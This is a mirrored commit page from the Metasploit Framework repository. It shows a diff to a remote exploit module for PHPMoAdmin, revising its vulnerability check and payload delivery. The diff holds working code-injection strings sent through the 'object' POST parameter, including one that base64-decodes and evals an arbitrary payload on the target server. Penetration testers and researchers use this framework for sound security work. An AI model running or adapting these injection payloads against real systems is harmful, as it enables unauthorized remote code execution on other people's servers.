1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Update phpmoadmin_exec.rb

Changes:
"Check if vulnerable" code improvement;
Payload delivery code improvement;
Minor indent issues.

Thanks for your feedback guys :)
This commit is contained in:
Ricardo Almeida 2015-03-05 12:46:53 +00:00
parent 9530e15c81
commit 95962aab0d

View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'PHPMoAdmin', { } ],
@ -44,16 +44,17 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
testrun = Rex::Text::rand_text_alpha(10)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s,'moadmin.php'),
'uri' => normalize_uri(target_uri,'moadmin.php'),
'method' => 'POST',
'vars_post' =>
{
'object' => '1;phpinfo();exit',
'object' => "1;echo '#{testrun}';exit",
}
})
if res and res.body.match(/Build Date/)
if res and res.body.include?(testrun)
return Exploit::CheckCode::Vulnerable
end
@ -65,14 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Executing payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s,'moadmin.php'),
'uri' => normalize_uri(target_uri,'moadmin.php'),
'method' => 'POST',
'vars_post' =>
{
'object' => "1;eval(base64_decode($_SERVER[HTTP_CMD]));exit"
},
'headers' => {
'Cmd' => Rex::Text.encode_base64(payload.encoded)
'object' => "1;eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
}
})